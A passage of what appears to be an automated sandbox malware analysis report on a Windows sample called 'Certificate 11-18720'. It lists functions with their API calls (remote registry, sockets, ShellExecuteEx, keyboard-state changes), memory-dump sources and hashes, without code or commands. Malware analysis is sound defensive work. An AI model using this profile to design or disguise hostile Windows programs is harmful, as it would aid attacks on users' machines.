                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006058B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: 1cc222a6e5983aa1202384c66da82ca69adab899dd5f241f7ed0c1dc8a8f8c01
                                                                                    • Instruction ID: 2e7c36a15e0187333e7c9536478459646c744f285df35d59183afab0fd48e3d9
                                                                                    • Opcode Fuzzy Hash: 1cc222a6e5983aa1202384c66da82ca69adab899dd5f241f7ed0c1dc8a8f8c01
                                                                                    • Instruction Fuzzy Hash: 83113D35B49773BAE70C5B559C82DAB27AEEF55310B20803AFD52E53C1F7B0AA404A64
                                                                                    Function 0060A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0060A806
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafeVartype
                                                                                    • String ID:
                                                                                    • API String ID: 1725837607-0
                                                                                    • Opcode ID: 5b0a00fd56000778cf60a49341af6ffd7eade23b9af4bbbf5d591e8e958cb393
                                                                                    • Instruction ID: 3ff613d522686ee4790083fb5f68217ba1f0eee95888f653f4e2892f213c8130
                                                                                    • Opcode Fuzzy Hash: 5b0a00fd56000778cf60a49341af6ffd7eade23b9af4bbbf5d591e8e958cb393
                                                                                    • Instruction Fuzzy Hash: C9C17C75A4021A9FDB18CF98C485BAFBBF6FF08351F24806AE605E7381D734A941CB91
                                                                                    Function 00606B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00606B63
                                                                                    • LoadStringW.USER32(00000000), ref: 00606B6A
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00606B80
                                                                                    • LoadStringW.USER32(00000000), ref: 00606B87
                                                                                    • _wprintf.LIBCMT ref: 00606BAD
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00606BCB
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00606BA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: 9c2600f23e42253d6c4200c1238d7bba1a76fb50620943f3ec4f1b4bd2127759
                                                                                    • Instruction ID: a59faeb5edd8f30d935b35a995ad7298cf05ef0fc61bc0b8ea54badc15e861be
                                                                                    • Opcode Fuzzy Hash: 9c2600f23e42253d6c4200c1238d7bba1a76fb50620943f3ec4f1b4bd2127759
                                                                                    • Instruction Fuzzy Hash: 750131F6900258BFEB11ABA4DD89EFB776DE708305F0054A1BB46E2141EA749E848F74
                                                                                    Function 00622B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00622BF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 2595220575-0
                                                                                    • Opcode ID: 7b838b3d841b61c19f1c665f24d328ba6573861d8a260750e8e900ee0be0715e
                                                                                    • Instruction ID: 10f45989a76c697c11206acc6cc298641ee55f2cf6c093d7e120d9dc743bdc31
                                                                                    • Opcode Fuzzy Hash: 7b838b3d841b61c19f1c665f24d328ba6573861d8a260750e8e900ee0be0715e
                                                                                    • Instruction Fuzzy Hash: 78917975604212AFCB10EF54D895BAEBBE6BF88314F04881DF996972A1DB34ED05CF42
                                                                                    Function 0061961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32 ref: 00619691
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0061969E
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006196C8
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006196E9
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006196F8
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00619765
                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 006197AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                    • String ID:
                                                                                    • API String ID: 500251541-0
                                                                                    • Opcode ID: 098f0d572df278634bf9c56efdeafaab3759dddca4b0e0b45d2a1049fe5d614c
                                                                                    • Instruction ID: e1b193fe91e7b0b83d2e27f7c79ea239db86f6105bbf8267494454a3a9bca30a
                                                                                    • Opcode Fuzzy Hash: 098f0d572df278634bf9c56efdeafaab3759dddca4b0e0b45d2a1049fe5d614c
                                                                                    • Instruction Fuzzy Hash: FE71CB31504201AFD314EFA4CC99FABBBAAFFC5714F144A1DF456972A1DB309904CBA2
                                                                                    Function 005EA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __mtinitlocknum.LIBCMT ref: 005EA991
                                                                                      • Part of subcall function 005E7D7C: __FF_MSGBANNER.LIBCMT ref: 005E7D91
                                                                                      • Part of subcall function 005E7D7C: __NMSG_WRITE.LIBCMT ref: 005E7D98
                                                                                      • Part of subcall function 005E7D7C: __malloc_crt.LIBCMT ref: 005E7DB8
                                                                                    • __lock.LIBCMT ref: 005EA9A4
                                                                                    • __lock.LIBCMT ref: 005EA9F0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00676DE0,00000018,005F5E7B,?,00000000,00000109), ref: 005EAA0C
                                                                                    • EnterCriticalSection.KERNEL32(8000000C,00676DE0,00000018,005F5E7B,?,00000000,00000109), ref: 005EAA29
                                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 005EAA39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1422805418-0
                                                                                    • Opcode ID: a898953a12c711a6bb71c4d8927c23f52ff155093e75d2339cd3f662ff8cc029
                                                                                    • Instruction ID: 7a7c6e2aedba2a5843a9d038ff25d9b03d478311828636b861a8e14267682f77
                                                                                    • Opcode Fuzzy Hash: a898953a12c711a6bb71c4d8927c23f52ff155093e75d2339cd3f662ff8cc029
                                                                                    • Instruction Fuzzy Hash: E6415B71D00796ABEB289F7AC94475CBFB07F41334F148328E4A5AB2D2D774A904CB81
                                                                                    Function 00628ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00628EE4
                                                                                    • GetDC.USER32(00000000), ref: 00628EEC
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00628EF7
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00628F03
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00628F3F
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00628F50
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0062BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00628F8A
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00628FAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: f5d0e53cd0bf055f72996dc087f1fc4fa7586f122a7df53be92b675b5f934e73
                                                                                    • Instruction ID: 9100d4d3e228bedd74161efe4e4b144fcf8d0bf2faa41d000765874bad93e188
                                                                                    • Opcode Fuzzy Hash: f5d0e53cd0bf055f72996dc087f1fc4fa7586f122a7df53be92b675b5f934e73
                                                                                    • Instruction Fuzzy Hash: 0B31BF76201624BFEB108F50DC49FEA3BAEEF4A755F054064FE089B291C6759841CB70
                                                                                    Function 00630133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0063016D
                                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0063038D
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006303AB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 006303D6
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006303FF
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00630421
                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00630440
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3356174886-0
                                                                                    • Opcode ID: a3b37e7c240cce7edcb20bbfdd82ac0e54abf2db27cf152cc061de6dacac0caf
                                                                                    • Instruction ID: 31912edd4a9d4ffc644d48e96085d50fef09ad41cdba4c25cf8b0f22272322c0
                                                                                    • Opcode Fuzzy Hash: a3b37e7c240cce7edcb20bbfdd82ac0e54abf2db27cf152cc061de6dacac0caf
                                                                                    • Instruction Fuzzy Hash: 44A18E35600616EBEB18CF68C9957FEBBB6FF08700F048115EC55AB290D774AD65CB90
                                                                                    Function 005DAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f12fe96de7929a8a82ab280eabb9f1efa6171e9a74872156993952ba595bea0
                                                                                    • Instruction ID: 0c0d61304287c014ff60767511a29d0809ba78b051094199795897709d7da691
                                                                                    • Opcode Fuzzy Hash: 9f12fe96de7929a8a82ab280eabb9f1efa6171e9a74872156993952ba595bea0
                                                                                    • Instruction Fuzzy Hash: 1F714AB590010AEFDB24CF98CC89AAFBF75FF85314F14818AF915A6351C7349A41CBA5
                                                                                    Function 00622230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0062225A
                                                                                    • _memset.LIBCMT ref: 00622323
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00622368
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                      • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0062242F
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0062243E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
                                                                                    • API String ID: 4082843840-2766056989
                                                                                    • Opcode ID: ae8a95038ae5218e1880e1082d76260f223cde215bcd76cc9071ba74c92ed757
                                                                                    • Instruction ID: 1790829811f5ea4ff4fb08fc2c9a229528ae6577c5f40f5f241f434708538463
                                                                                    • Opcode Fuzzy Hash: ae8a95038ae5218e1880e1082d76260f223cde215bcd76cc9071ba74c92ed757
                                                                                    • Instruction Fuzzy Hash: 8F715F7490062AAFCF15EF98D895A9EBBF6FF88310F104459E855AB351CB34AD40CF94
                                                                                    Function 00603DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00603DE7
                                                                                    • GetKeyboardState.USER32(?), ref: 00603DFC
                                                                                    • SetKeyboardState.USER32(?), ref: 00603E5D
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00603E8B
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00603EAA
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00603EF0
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00603F13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: f1cfaadeddd8d2c82bfd42457bc3152523047db9dcf2c864cd7398c7ad42f50d
                                                                                    • Instruction ID: 5909de104200ac2195dcfbfef0f5f70046eafb8570ce73bc52d361d2d656e7d3
                                                                                    • Opcode Fuzzy Hash: f1cfaadeddd8d2c82bfd42457bc3152523047db9dcf2c864cd7398c7ad42f50d
                                                                                    • Instruction Fuzzy Hash: 9E51E3A0A847E23DFB3A4324CC45BF77EAE5B06305F08858DE1D546AD2D794AEC4D750
                                                                                    Function 00603BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00603C02
                                                                                    • GetKeyboardState.USER32(?), ref: 00603C17
                                                                                    • SetKeyboardState.USER32(?), ref: 00603C78
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00603CA4
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00603CC1
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00603D05
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00603D26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: bbb4496fca0210b1b18d9fda4e2dd3e390c2f98641bc34360cf9de6a8c3c9fcb
                                                                                    • Instruction ID: 008f48f93fb87d313f3eb2c52d676106a64f81688e6aa8af7bbb453ac3be6adf
                                                                                    • Opcode Fuzzy Hash: bbb4496fca0210b1b18d9fda4e2dd3e390c2f98641bc34360cf9de6a8c3c9fcb
                                                                                    • Instruction Fuzzy Hash: 285126A05847E53DFB3A83248C05BF7BF9E9F06305F088489E1C5967C2D694EE84D750
                                                                                    Function 00623D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00623DA1
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00623DCB
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00623E80
                                                                                      • Part of subcall function 00623D72: RegCloseKey.ADVAPI32(?), ref: 00623DE8
                                                                                      • Part of subcall function 00623D72: FreeLibrary.KERNEL32(?), ref: 00623E3A
                                                                                      • Part of subcall function 00623D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00623E5D
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00623E25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: 402bdf0f21b8b495d23b4eb365c8677f681dbd99f7576b3849535e8dc94d3bf6
                                                                                    • Instruction ID: 65dc8b609860e2ce74bb165492142cfbe729bf9f3a99ed3b739e77751f4d3a84
                                                                                    • Opcode Fuzzy Hash: 402bdf0f21b8b495d23b4eb365c8677f681dbd99f7576b3849535e8dc94d3bf6
                                                                                    • Instruction Fuzzy Hash: F83119B5D01129BFDB159F90EC85AFFB7BEEF09340F00016AA552A2250D7749F499FA0
                                                                                    Function 00628FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00628FE7
                                                                                    • GetWindowLongW.USER32(00F1E2E0,000000F0), ref: 0062901A
                                                                                    • GetWindowLongW.USER32(00F1E2E0,000000F0), ref: 0062904F
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00629081
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006290AB
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006290BC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006290D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 94beba7c85f1bb8ab0ba074970b112fb99d806e4ae6c26d1179b32abbcd24dd9
                                                                                    • Instruction ID: a82fe83c8573d526032c6b13452a5774719da38888750636f09d8573dfa8a996
                                                                                    • Opcode Fuzzy Hash: 94beba7c85f1bb8ab0ba074970b112fb99d806e4ae6c26d1179b32abbcd24dd9
                                                                                    • Instruction Fuzzy Hash: 9C315B34600629EFDB20CF58EC84F9437A6FB8A314F151268FA198F2B1CB71A841CF50
                                                                                    Function 006008AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
